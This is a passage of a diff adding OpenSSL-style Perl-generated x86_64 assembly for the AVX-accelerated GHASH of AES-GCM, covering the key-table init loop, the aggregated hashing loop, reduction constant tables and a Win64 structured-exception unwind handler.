+	vpxor		$Xhi,$Xi,$Xi		#
+___
+}
+
+$code.=<<___;
+.align	32
+.Linit_loop_avx:
+	vpalignr	\$8,$T1,$T2,$T3		# low part is H.lo^H.hi...
+	vmovdqu		$T3,-0x10($Htbl)	# save Karatsuba "salt"
+___
+	&clmul64x64_avx	($Xhi,$Xi,$Hkey,$HK);	# calculate H^3,5,7
+	&reduction_avx	($Xhi,$Xi);
+$code.=<<___;
+.Linit_start_avx:
+	vmovdqa		$Xi,$T3
+___
+	&clmul64x64_avx	($Xhi,$Xi,$Hkey,$HK);	# calculate H^2,4,6,8
+	&reduction_avx	($Xhi,$Xi);
+$code.=<<___;
+	vpshufd		\$0b01001110,$T3,$T1
+	vpshufd		\$0b01001110,$Xi,$T2
+	vpxor		$T3,$T1,$T1		# Karatsuba pre-processing
+	vmovdqu		$T3,0x00($Htbl)		# save H^1,3,5,7
+	vpxor		$Xi,$T2,$T2		# Karatsuba pre-processing
+	vmovdqu		$Xi,0x10($Htbl)		# save H^2,4,6,8
+	lea		0x30($Htbl),$Htbl
+	sub		\$1,%r10
+	jnz		.Linit_loop_avx
+
+	vpalignr	\$8,$T2,$T1,$T3		# last "salt" is flipped
+	vmovdqu		$T3,-0x10($Htbl)
+
+	vzeroupper
+___
+$code.=<<___ if ($win64);
+	movaps	(%rsp),%xmm6
+	lea	0x18(%rsp),%rsp
+.LSEH_end_gcm_init_avx:
+___
+$code.=<<___;
+	ret
+.size	gcm_init_avx,.-gcm_init_avx
+___
+} else {
+$code.=<<___;
+	jmp	.L_init_clmul
+.size	gcm_init_avx,.-gcm_init_avx
+___
+}
+
+$code.=<<___;
+.globl	gcm_gmult_avx
+.type	gcm_gmult_avx,\@abi-omnipotent
+.align	32
+gcm_gmult_avx:
+	jmp	.L_gmult_clmul
+.size	gcm_gmult_avx,.-gcm_gmult_avx
+___
+
+$code.=<<___;
+.globl	gcm_ghash_avx
+.type	gcm_ghash_avx,\@abi-omnipotent
+.align	32
+gcm_ghash_avx:
+___
+if ($avx) {
+my ($Xip,$Htbl,$inp,$len)=@_4args;
+my ($Xlo,$Xhi,$Xmi,
+    $Zlo,$Zhi,$Zmi,
+    $Hkey,$HK,$T1,$T2,
+    $Xi,$Xo,$Tred,$bswap,$Ii,$Ij) = map("%xmm$_",(0..15));
+
+$code.=<<___ if ($win64);
+	lea	-0x88(%rsp),%rax
+.LSEH_begin_gcm_ghash_avx:
+	# I can't trust assembler to use specific encoding:-(
+	.byte	0x48,0x8d,0x60,0xe0		#lea	-0x20(%rax),%rsp
+	.byte	0x0f,0x29,0x70,0xe0		#movaps	%xmm6,-0x20(%rax)
+	.byte	0x0f,0x29,0x78,0xf0		#movaps	%xmm7,-0x10(%rax)
+	.byte	0x44,0x0f,0x29,0x00		#movaps	%xmm8,0(%rax)
+	.byte	0x44,0x0f,0x29,0x48,0x10	#movaps	%xmm9,0x10(%rax)
+	.byte	0x44,0x0f,0x29,0x50,0x20	#movaps	%xmm10,0x20(%rax)
+	.byte	0x44,0x0f,0x29,0x58,0x30	#movaps	%xmm11,0x30(%rax)
+	.byte	0x44,0x0f,0x29,0x60,0x40	#movaps	%xmm12,0x40(%rax)
+	.byte	0x44,0x0f,0x29,0x68,0x50	#movaps	%xmm13,0x50(%rax)
+	.byte	0x44,0x0f,0x29,0x70,0x60	#movaps	%xmm14,0x60(%rax)
+	.byte	0x44,0x0f,0x29,0x78,0x70	#movaps	%xmm15,0x70(%rax)
+___
+$code.=<<___;
+	vzeroupper
+
+	vmovdqu		($Xip),$Xi		# load $Xi
+	lea		.L0x1c2_polynomial(%rip),%r10
+	lea		0x40($Htbl),$Htbl	# size optimization
+	vmovdqu		.Lbswap_mask(%rip),$bswap
+	vpshufb		$bswap,$Xi,$Xi
+	cmp		\$0x80,$len
+	jb		.Lshort_avx
+	sub		\$0x80,$len
+
+	vmovdqu		0x70($inp),$Ii		# I[7]
+	vmovdqu		0x00-0x40($Htbl),$Hkey	# $Hkey^1
+	vpshufb		$bswap,$Ii,$Ii
+	vmovdqu		0x20-0x40($Htbl),$HK
+
+	vpunpckhqdq	$Ii,$Ii,$T2
+	 vmovdqu	0x60($inp),$Ij		# I[6]
+	vpclmulqdq	\$0x00,$Hkey,$Ii,$Xlo
+	vpxor		$Ii,$T2,$T2
+	 vpshufb	$bswap,$Ij,$Ij
+	vpclmulqdq	\$0x11,$Hkey,$Ii,$Xhi
+	 vmovdqu	0x10-0x40($Htbl),$Hkey	# $Hkey^2
+	 vpunpckhqdq	$Ij,$Ij,$T1
+	 vmovdqu	0x50($inp),$Ii		# I[5]
+	vpclmulqdq	\$0x00,$HK,$T2,$Xmi
+	 vpxor		$Ij,$T1,$T1
+
+	 vpshufb	$bswap,$Ii,$Ii
+	vpclmulqdq	\$0x00,$Hkey,$Ij,$Zlo
+	 vpunpckhqdq	$Ii,$Ii,$T2
+	vpclmulqdq	\$0x11,$Hkey,$Ij,$Zhi
+	 vmovdqu	0x30-0x40($Htbl),$Hkey	# $Hkey^3
+	 vpxor		$Ii,$T2,$T2
+	 vmovdqu	0x40($inp),$Ij		# I[4]
+	vpclmulqdq	\$0x10,$HK,$T1,$Zmi
+	 vmovdqu	0x50-0x40($Htbl),$HK
+
+	 vpshufb	$bswap,$Ij,$Ij
+	vpxor		$Xlo,$Zlo,$Zlo
+	vpclmulqdq	\$0x00,$Hkey,$Ii,$Xlo
+	vpxor		$Xhi,$Zhi,$Zhi
+	 vpunpckhqdq	$Ij,$Ij,$T1
+	vpclmulqdq	\$0x11,$Hkey,$Ii,$Xhi
+	 vmovdqu	0x40-0x40($Htbl),$Hkey	# $Hkey^4
+	vpxor		$Xmi,$Zmi,$Zmi
+	vpclmulqdq	\$0x00,$HK,$T2,$Xmi
+	 vpxor		$Ij,$T1,$T1
+
+	 vmovdqu	0x30($inp),$Ii		# I[3]
+	vpxor		$Zlo,$Xlo,$Xlo
+	vpclmulqdq	\$0x00,$Hkey,$Ij,$Zlo
+	vpxor		$Zhi,$Xhi,$Xhi
+	 vpshufb	$bswap,$Ii,$Ii
+	vpclmulqdq	\$0x11,$Hkey,$Ij,$Zhi
+	 vmovdqu	0x60-0x40($Htbl),$Hkey	# $Hkey^5
+	vpxor		$Zmi,$Xmi,$Xmi
+	 vpunpckhqdq	$Ii,$Ii,$T2
+	vpclmulqdq	\$0x10,$HK,$T1,$Zmi
+	 vmovdqu	0x80-0x40($Htbl),$HK
+	 vpxor		$Ii,$T2,$T2
+
+	 vmovdqu	0x20($inp),$Ij		# I[2]
+	vpxor		$Xlo,$Zlo,$Zlo
+	vpclmulqdq	\$0x00,$Hkey,$Ii,$Xlo
+	vpxor		$Xhi,$Zhi,$Zhi
+	 vpshufb	$bswap,$Ij,$Ij
+	vpclmulqdq	\$0x11,$Hkey,$Ii,$Xhi
+	 vmovdqu	0x70-0x40($Htbl),$Hkey	# $Hkey^6
+	vpxor		$Xmi,$Zmi,$Zmi
+	 vpunpckhqdq	$Ij,$Ij,$T1
+	vpclmulqdq	\$0x00,$HK,$T2,$Xmi
+	 vpxor		$Ij,$T1,$T1
+
+	 vmovdqu	0x10($inp),$Ii		# I[1]
+	vpxor		$Zlo,$Xlo,$Xlo
+	vpclmulqdq	\$0x00,$Hkey,$Ij,$Zlo
+	vpxor		$Zhi,$Xhi,$Xhi
+	 vpshufb	$bswap,$Ii,$Ii
+	vpclmulqdq	\$0x11,$Hkey,$Ij,$Zhi
+	 vmovdqu	0x90-0x40($Htbl),$Hkey	# $Hkey^7
+	vpxor		$Zmi,$Xmi,$Xmi
+	 vpunpckhqdq	$Ii,$Ii,$T2
+	vpclmulqdq	\$0x10,$HK,$T1,$Zmi
+	 vmovdqu	0xb0-0x40($Htbl),$HK
+	 vpxor		$Ii,$T2,$T2
+
+	 vmovdqu	($inp),$Ij		# I[0]
+	vpxor		$Xlo,$Zlo,$Zlo
+	vpclmulqdq	\$0x00,$Hkey,$Ii,$Xlo
+	vpxor		$Xhi,$Zhi,$Zhi
+	 vpshufb	$bswap,$Ij,$Ij
+	vpclmulqdq	\$0x11,$Hkey,$Ii,$Xhi
+	 vmovdqu	0xa0-0x40($Htbl),$Hkey	# $Hkey^8
+	vpxor		$Xmi,$Zmi,$Zmi
+	vpclmulqdq	\$0x10,$HK,$T2,$Xmi
+
+	lea		0x80($inp),$inp
+	cmp		\$0x80,$len
+	jb		.Ltail_avx
+
+	vpxor		$Xi,$Ij,$Ij		# accumulate $Xi
+	sub		\$0x80,$len
+	jmp		.Loop8x_avx
+
+.align	32
+.Loop8x_avx:
+	vpunpckhqdq	$Ij,$Ij,$T1
+	 vmovdqu	0x70($inp),$Ii		# I[7]
+	vpxor		$Xlo,$Zlo,$Zlo
+	vpxor		$Ij,$T1,$T1
+	vpclmulqdq	\$0x00,$Hkey,$Ij,$Xi
+	 vpshufb	$bswap,$Ii,$Ii
+	vpxor		$Xhi,$Zhi,$Zhi
+	vpclmulqdq	\$0x11,$Hkey,$Ij,$Xo
+	 vmovdqu	0x00-0x40($Htbl),$Hkey	# $Hkey^1
+	 vpunpckhqdq	$Ii,$Ii,$T2
+	vpxor		$Xmi,$Zmi,$Zmi
+	vpclmulqdq	\$0x00,$HK,$T1,$Tred
+	 vmovdqu	0x20-0x40($Htbl),$HK
+	 vpxor		$Ii,$T2,$T2
+
+	  vmovdqu	0x60($inp),$Ij		# I[6]
+	 vpclmulqdq	\$0x00,$Hkey,$Ii,$Xlo
+	vpxor		$Zlo,$Xi,$Xi		# collect result
+	  vpshufb	$bswap,$Ij,$Ij
+	 vpclmulqdq	\$0x11,$Hkey,$Ii,$Xhi
+	vxorps		$Zhi,$Xo,$Xo
+	  vmovdqu	0x10-0x40($Htbl),$Hkey	# $Hkey^2
+	 vpunpckhqdq	$Ij,$Ij,$T1
+	 vpclmulqdq	\$0x00,$HK,  $T2,$Xmi
+	vpxor		$Zmi,$Tred,$Tred
+	 vxorps		$Ij,$T1,$T1
+
+	  vmovdqu	0x50($inp),$Ii		# I[5]
+	vpxor		$Xi,$Tred,$Tred		# aggregated Karatsuba post-processing
+	 vpclmulqdq	\$0x00,$Hkey,$Ij,$Zlo
+	vpxor		$Xo,$Tred,$Tred
+	vpslldq		\$8,$Tred,$T2
+	 vpxor		$Xlo,$Zlo,$Zlo
+	 vpclmulqdq	\$0x11,$Hkey,$Ij,$Zhi
+	vpsrldq		\$8,$Tred,$Tred
+	vpxor		$T2, $Xi, $Xi
+	  vmovdqu	0x30-0x40($Htbl),$Hkey	# $Hkey^3
+	  vpshufb	$bswap,$Ii,$Ii
+	vxorps		$Tred,$Xo, $Xo
+	 vpxor		$Xhi,$Zhi,$Zhi
+	 vpunpckhqdq	$Ii,$Ii,$T2
+	 vpclmulqdq	\$0x10,$HK,  $T1,$Zmi
+	  vmovdqu	0x50-0x40($Htbl),$HK
+	 vpxor		$Ii,$T2,$T2
+	 vpxor		$Xmi,$Zmi,$Zmi
+
+	  vmovdqu	0x40($inp),$Ij		# I[4]
+	vpalignr	\$8,$Xi,$Xi,$Tred	# 1st phase
+	 vpclmulqdq	\$0x00,$Hkey,$Ii,$Xlo
+	  vpshufb	$bswap,$Ij,$Ij
+	 vpxor		$Zlo,$Xlo,$Xlo
+	 vpclmulqdq	\$0x11,$Hkey,$Ii,$Xhi
+	  vmovdqu	0x40-0x40($Htbl),$Hkey	# $Hkey^4
+	 vpunpckhqdq	$Ij,$Ij,$T1
+	 vpxor		$Zhi,$Xhi,$Xhi
+	 vpclmulqdq	\$0x00,$HK,  $T2,$Xmi
+	 vxorps		$Ij,$T1,$T1
+	 vpxor		$Zmi,$Xmi,$Xmi
+
+	  vmovdqu	0x30($inp),$Ii		# I[3]
+	vpclmulqdq	\$0x10,(%r10),$Xi,$Xi
+	 vpclmulqdq	\$0x00,$Hkey,$Ij,$Zlo
+	  vpshufb	$bswap,$Ii,$Ii
+	 vpxor		$Xlo,$Zlo,$Zlo
+	 vpclmulqdq	\$0x11,$Hkey,$Ij,$Zhi
+	  vmovdqu	0x60-0x40($Htbl),$Hkey	# $Hkey^5
+	 vpunpckhqdq	$Ii,$Ii,$T2
+	 vpxor		$Xhi,$Zhi,$Zhi
+	 vpclmulqdq	\$0x10,$HK,  $T1,$Zmi
+	  vmovdqu	0x80-0x40($Htbl),$HK
+	 vpxor		$Ii,$T2,$T2
+	 vpxor		$Xmi,$Zmi,$Zmi
+
+	  vmovdqu	0x20($inp),$Ij		# I[2]
+	 vpclmulqdq	\$0x00,$Hkey,$Ii,$Xlo
+	  vpshufb	$bswap,$Ij,$Ij
+	 vpxor		$Zlo,$Xlo,$Xlo
+	 vpclmulqdq	\$0x11,$Hkey,$Ii,$Xhi
+	  vmovdqu	0x70-0x40($Htbl),$Hkey	# $Hkey^6
+	 vpunpckhqdq	$Ij,$Ij,$T1
+	 vpxor		$Zhi,$Xhi,$Xhi
+	 vpclmulqdq	\$0x00,$HK,  $T2,$Xmi
+	 vpxor		$Ij,$T1,$T1
+	 vpxor		$Zmi,$Xmi,$Xmi
+	vxorps		$Tred,$Xi,$Xi
+
+	  vmovdqu	0x10($inp),$Ii		# I[1]
+	vpalignr	\$8,$Xi,$Xi,$Tred	# 2nd phase
+	 vpclmulqdq	\$0x00,$Hkey,$Ij,$Zlo
+	  vpshufb	$bswap,$Ii,$Ii
+	 vpxor		$Xlo,$Zlo,$Zlo
+	 vpclmulqdq	\$0x11,$Hkey,$Ij,$Zhi
+	  vmovdqu	0x90-0x40($Htbl),$Hkey	# $Hkey^7
+	vpclmulqdq	\$0x10,(%r10),$Xi,$Xi
+	vxorps		$Xo,$Tred,$Tred
+	 vpunpckhqdq	$Ii,$Ii,$T2
+	 vpxor		$Xhi,$Zhi,$Zhi
+	 vpclmulqdq	\$0x10,$HK,  $T1,$Zmi
+	  vmovdqu	0xb0-0x40($Htbl),$HK
+	 vpxor		$Ii,$T2,$T2
+	 vpxor		$Xmi,$Zmi,$Zmi
+
+	  vmovdqu	($inp),$Ij		# I[0]
+	 vpclmulqdq	\$0x00,$Hkey,$Ii,$Xlo
+	  vpshufb	$bswap,$Ij,$Ij
+	 vpclmulqdq	\$0x11,$Hkey,$Ii,$Xhi
+	  vmovdqu	0xa0-0x40($Htbl),$Hkey	# $Hkey^8
+	vpxor		$Tred,$Ij,$Ij
+	 vpclmulqdq	\$0x10,$HK,  $T2,$Xmi
+	vpxor		$Xi,$Ij,$Ij		# accumulate $Xi
+
+	lea		0x80($inp),$inp
+	sub		\$0x80,$len
+	jnc		.Loop8x_avx
+
+	add		\$0x80,$len
+	jmp		.Ltail_no_xor_avx
+
+.align	32
+.Lshort_avx:
+	vmovdqu		-0x10($inp,$len),$Ii	# very last word
+	lea		($inp,$len),$inp
+	vmovdqu		0x00-0x40($Htbl),$Hkey	# $Hkey^1
+	vmovdqu		0x20-0x40($Htbl),$HK
+	vpshufb		$bswap,$Ii,$Ij
+
+	vmovdqa		$Xlo,$Zlo		# subtle way to zero $Zlo,
+	vmovdqa		$Xhi,$Zhi		# $Zhi and
+	vmovdqa		$Xmi,$Zmi		# $Zmi
+	sub		\$0x10,$len
+	jz		.Ltail_avx
+
+	vpunpckhqdq	$Ij,$Ij,$T1
+	vpxor		$Xlo,$Zlo,$Zlo
+	vpclmulqdq	\$0x00,$Hkey,$Ij,$Xlo
+	vpxor		$Ij,$T1,$T1
+	 vmovdqu	-0x20($inp),$Ii
+	vpxor		$Xhi,$Zhi,$Zhi
+	vpclmulqdq	\$0x11,$Hkey,$Ij,$Xhi
+	vmovdqu		0x10-0x40($Htbl),$Hkey	# $Hkey^2
+	 vpshufb	$bswap,$Ii,$Ij
+	vpxor		$Xmi,$Zmi,$Zmi
+	vpclmulqdq	\$0x00,$HK,$T1,$Xmi
+	vpsrldq		\$8,$HK,$HK
+	sub		\$0x10,$len
+	jz		.Ltail_avx
+
+	vpunpckhqdq	$Ij,$Ij,$T1
+	vpxor		$Xlo,$Zlo,$Zlo
+	vpclmulqdq	\$0x00,$Hkey,$Ij,$Xlo
+	vpxor		$Ij,$T1,$T1
+	 vmovdqu	-0x30($inp),$Ii
+	vpxor		$Xhi,$Zhi,$Zhi
+	vpclmulqdq	\$0x11,$Hkey,$Ij,$Xhi
+	vmovdqu		0x30-0x40($Htbl),$Hkey	# $Hkey^3
+	 vpshufb	$bswap,$Ii,$Ij
+	vpxor		$Xmi,$Zmi,$Zmi
+	vpclmulqdq	\$0x00,$HK,$T1,$Xmi
+	vmovdqu		0x50-0x40($Htbl),$HK
+	sub		\$0x10,$len
+	jz		.Ltail_avx
+
+	vpunpckhqdq	$Ij,$Ij,$T1
+	vpxor		$Xlo,$Zlo,$Zlo
+	vpclmulqdq	\$0x00,$Hkey,$Ij,$Xlo
+	vpxor		$Ij,$T1,$T1
+	 vmovdqu	-0x40($inp),$Ii
+	vpxor		$Xhi,$Zhi,$Zhi
+	vpclmulqdq	\$0x11,$Hkey,$Ij,$Xhi
+	vmovdqu		0x40-0x40($Htbl),$Hkey	# $Hkey^4
+	 vpshufb	$bswap,$Ii,$Ij
+	vpxor		$Xmi,$Zmi,$Zmi
+	vpclmulqdq	\$0x00,$HK,$T1,$Xmi
+	vpsrldq		\$8,$HK,$HK
+	sub		\$0x10,$len
+	jz		.Ltail_avx
+
+	vpunpckhqdq	$Ij,$Ij,$T1
+	vpxor		$Xlo,$Zlo,$Zlo
+	vpclmulqdq	\$0x00,$Hkey,$Ij,$Xlo
+	vpxor		$Ij,$T1,$T1
+	 vmovdqu	-0x50($inp),$Ii
+	vpxor		$Xhi,$Zhi,$Zhi
+	vpclmulqdq	\$0x11,$Hkey,$Ij,$Xhi
+	vmovdqu		0x60-0x40($Htbl),$Hkey	# $Hkey^5
+	 vpshufb	$bswap,$Ii,$Ij
+	vpxor		$Xmi,$Zmi,$Zmi
+	vpclmulqdq	\$0x00,$HK,$T1,$Xmi
+	vmovdqu		0x80-0x40($Htbl),$HK
+	sub		\$0x10,$len
+	jz		.Ltail_avx
+
+	vpunpckhqdq	$Ij,$Ij,$T1
+	vpxor		$Xlo,$Zlo,$Zlo
+	vpclmulqdq	\$0x00,$Hkey,$Ij,$Xlo
+	vpxor		$Ij,$T1,$T1
+	 vmovdqu	-0x60($inp),$Ii
+	vpxor		$Xhi,$Zhi,$Zhi
+	vpclmulqdq	\$0x11,$Hkey,$Ij,$Xhi
+	vmovdqu		0x70-0x40($Htbl),$Hkey	# $Hkey^6
+	 vpshufb	$bswap,$Ii,$Ij
+	vpxor		$Xmi,$Zmi,$Zmi
+	vpclmulqdq	\$0x00,$HK,$T1,$Xmi
+	vpsrldq		\$8,$HK,$HK
+	sub		\$0x10,$len
+	jz		.Ltail_avx
+
+	vpunpckhqdq	$Ij,$Ij,$T1
+	vpxor		$Xlo,$Zlo,$Zlo
+	vpclmulqdq	\$0x00,$Hkey,$Ij,$Xlo
+	vpxor		$Ij,$T1,$T1
+	 vmovdqu	-0x70($inp),$Ii
+	vpxor		$Xhi,$Zhi,$Zhi
+	vpclmulqdq	\$0x11,$Hkey,$Ij,$Xhi
+	vmovdqu		0x90-0x40($Htbl),$Hkey	# $Hkey^7
+	 vpshufb	$bswap,$Ii,$Ij
+	vpxor		$Xmi,$Zmi,$Zmi
+	vpclmulqdq	\$0x00,$HK,$T1,$Xmi
+	vmovq		0xb8-0x40($Htbl),$HK
+	sub		\$0x10,$len
+	jmp		.Ltail_avx
+
+.align	32
+.Ltail_avx:
+	vpxor		$Xi,$Ij,$Ij		# accumulate $Xi
+.Ltail_no_xor_avx:
+	vpunpckhqdq	$Ij,$Ij,$T1
+	vpxor		$Xlo,$Zlo,$Zlo
+	vpclmulqdq	\$0x00,$Hkey,$Ij,$Xlo
+	vpxor		$Ij,$T1,$T1
+	vpxor		$Xhi,$Zhi,$Zhi
+	vpclmulqdq	\$0x11,$Hkey,$Ij,$Xhi
+	vpxor		$Xmi,$Zmi,$Zmi
+	vpclmulqdq	\$0x00,$HK,$T1,$Xmi
+
+	vmovdqu		(%r10),$Tred
+
+	vpxor		$Xlo,$Zlo,$Xi
+	vpxor		$Xhi,$Zhi,$Xo
+	vpxor		$Xmi,$Zmi,$Zmi
+
+	vpxor		$Xi, $Zmi,$Zmi		# aggregated Karatsuba post-processing
+	vpxor		$Xo, $Zmi,$Zmi
+	vpslldq		\$8, $Zmi,$T2
+	vpsrldq		\$8, $Zmi,$Zmi
+	vpxor		$T2, $Xi, $Xi
+	vpxor		$Zmi,$Xo, $Xo
+
+	vpclmulqdq	\$0x10,$Tred,$Xi,$T2	# 1st phase
+	vpalignr	\$8,$Xi,$Xi,$Xi
+	vpxor		$T2,$Xi,$Xi
+
+	vpclmulqdq	\$0x10,$Tred,$Xi,$T2	# 2nd phase
+	vpalignr	\$8,$Xi,$Xi,$Xi
+	vpxor		$Xo,$Xi,$Xi
+	vpxor		$T2,$Xi,$Xi
+
+	cmp		\$0,$len
+	jne		.Lshort_avx
+
+	vpshufb		$bswap,$Xi,$Xi
+	vmovdqu		$Xi,($Xip)
+	vzeroupper
+___
+$code.=<<___ if ($win64);
+	movaps	(%rsp),%xmm6
+	movaps	0x10(%rsp),%xmm7
+	movaps	0x20(%rsp),%xmm8
+	movaps	0x30(%rsp),%xmm9
+	movaps	0x40(%rsp),%xmm10
+	movaps	0x50(%rsp),%xmm11
+	movaps	0x60(%rsp),%xmm12
+	movaps	0x70(%rsp),%xmm13
+	movaps	0x80(%rsp),%xmm14
+	movaps	0x90(%rsp),%xmm15
+	lea	0xa8(%rsp),%rsp
+.LSEH_end_gcm_ghash_avx:
+___
+$code.=<<___;
+	ret
+.size	gcm_ghash_avx,.-gcm_ghash_avx
+___
+} else {
+$code.=<<___;
+	jmp	.L_ghash_clmul
+.size	gcm_ghash_avx,.-gcm_ghash_avx
+___
+}
+
+$code.=<<___;
+.align	64
+.Lbswap_mask:
+	.byte	15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,0
+.L0x1c2_polynomial:
+	.byte	1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0xc2
+.L7_mask:
+	.long	7,0,7,0
+.L7_mask_poly:
+	.long	7,0,`0xE1<<1`,0
+.align	64
+.type	.Lrem_4bit,\@object
+.Lrem_4bit:
+	.long	0,`0x0000<<16`,0,`0x1C20<<16`,0,`0x3840<<16`,0,`0x2460<<16`
+	.long	0,`0x7080<<16`,0,`0x6CA0<<16`,0,`0x48C0<<16`,0,`0x54E0<<16`
+	.long	0,`0xE100<<16`,0,`0xFD20<<16`,0,`0xD940<<16`,0,`0xC560<<16`
+	.long	0,`0x9180<<16`,0,`0x8DA0<<16`,0,`0xA9C0<<16`,0,`0xB5E0<<16`
+.type	.Lrem_8bit,\@object
+.Lrem_8bit:
+	.value	0x0000,0x01C2,0x0384,0x0246,0x0708,0x06CA,0x048C,0x054E
+	.value	0x0E10,0x0FD2,0x0D94,0x0C56,0x0918,0x08DA,0x0A9C,0x0B5E
+	.value	0x1C20,0x1DE2,0x1FA4,0x1E66,0x1B28,0x1AEA,0x18AC,0x196E
+	.value	0x1230,0x13F2,0x11B4,0x1076,0x1538,0x14FA,0x16BC,0x177E
+	.value	0x3840,0x3982,0x3BC4,0x3A06,0x3F48,0x3E8A,0x3CCC,0x3D0E
+	.value	0x3650,0x3792,0x35D4,0x3416,0x3158,0x309A,0x32DC,0x331E
+	.value	0x2460,0x25A2,0x27E4,0x2626,0x2368,0x22AA,0x20EC,0x212E
+	.value	0x2A70,0x2BB2,0x29F4,0x2836,0x2D78,0x2CBA,0x2EFC,0x2F3E
+	.value	0x7080,0x7142,0x7304,0x72C6,0x7788,0x764A,0x740C,0x75CE
+	.value	0x7E90,0x7F52,0x7D14,0x7CD6,0x7998,0x785A,0x7A1C,0x7BDE
+	.value	0x6CA0,0x6D62,0x6F24,0x6EE6,0x6BA8,0x6A6A,0x682C,0x69EE
+	.value	0x62B0,0x6372,0x6134,0x60F6,0x65B8,0x647A,0x663C,0x67FE
+	.value	0x48C0,0x4902,0x4B44,0x4A86,0x4FC8,0x4E0A,0x4C4C,0x4D8E
+	.value	0x46D0,0x4712,0x4554,0x4496,0x41D8,0x401A,0x425C,0x439E
+	.value	0x54E0,0x5522,0x5764,0x56A6,0x53E8,0x522A,0x506C,0x51AE
+	.value	0x5AF0,0x5B32,0x5974,0x58B6,0x5DF8,0x5C3A,0x5E7C,0x5FBE
+	.value	0xE100,0xE0C2,0xE284,0xE346,0xE608,0xE7CA,0xE58C,0xE44E
+	.value	0xEF10,0xEED2,0xEC94,0xED56,0xE818,0xE9DA,0xEB9C,0xEA5E
+	.value	0xFD20,0xFCE2,0xFEA4,0xFF66,0xFA28,0xFBEA,0xF9AC,0xF86E
+	.value	0xF330,0xF2F2,0xF0B4,0xF176,0xF438,0xF5FA,0xF7BC,0xF67E
+	.value	0xD940,0xD882,0xDAC4,0xDB06,0xDE48,0xDF8A,0xDDCC,0xDC0E
+	.value	0xD750,0xD692,0xD4D4,0xD516,0xD058,0xD19A,0xD3DC,0xD21E
+	.value	0xC560,0xC4A2,0xC6E4,0xC726,0xC268,0xC3AA,0xC1EC,0xC02E
+	.value	0xCB70,0xCAB2,0xC8F4,0xC936,0xCC78,0xCDBA,0xCFFC,0xCE3E
+	.value	0x9180,0x9042,0x9204,0x93C6,0x9688,0x974A,0x950C,0x94CE
+	.value	0x9F90,0x9E52,0x9C14,0x9DD6,0x9898,0x995A,0x9B1C,0x9ADE
+	.value	0x8DA0,0x8C62,0x8E24,0x8FE6,0x8AA8,0x8B6A,0x892C,0x88EE
+	.value	0x83B0,0x8272,0x8034,0x81F6,0x84B8,0x857A,0x873C,0x86FE
+	.value	0xA9C0,0xA802,0xAA44,0xAB86,0xAEC8,0xAF0A,0xAD4C,0xAC8E
+	.value	0xA7D0,0xA612,0xA454,0xA596,0xA0D8,0xA11A,0xA35C,0xA29E
+	.value	0xB5E0,0xB422,0xB664,0xB7A6,0xB2E8,0xB32A,0xB16C,0xB0AE
+	.value	0xBBF0,0xBA32,0xB874,0xB9B6,0xBCF8,0xBD3A,0xBF7C,0xBEBE
+
+.asciz	"GHASH for x86_64, CRYPTOGAMS by <appro\@openssl.org>"
+.align	64
+___
+
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+if ($win64) {
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	se_handler,\@abi-omnipotent
+.align	16
+se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# prologue label
+	cmp	%r10,%rbx		# context->Rip<prologue label
+	jb	.Lin_prologue
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lin_prologue
+
+	lea	24(%rax),%rax		# adjust "rsp"
+
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	-24(%rax),%r12
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore context->R12
+
+.Lin_prologue:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$`1232/8`,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	se_handler,.-se_handler
+
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_gcm_gmult_4bit
+	.rva	.LSEH_end_gcm_gmult_4bit
+	.rva	.LSEH_info_gcm_gmult_4bit
+
+	.rva	.LSEH_begin_gcm_ghash_4bit
+	.rva	.LSEH_end_gcm_ghash_4bit
+	.rva	.LSEH_info_gcm_ghash_4bit
+
+	.rva	.LSEH_begin_gcm_init_clmul
+	.rva	.LSEH_end_gcm_init_clmul
+	.rva	.LSEH_info_gcm_init_clmul
+
+	.rva	.LSEH_begin_gcm_ghash_clmul
+	.rva	.LSEH_end_gcm_ghash_clmul
+	.rva	.LSEH_info_gcm_ghash_clmul
+___
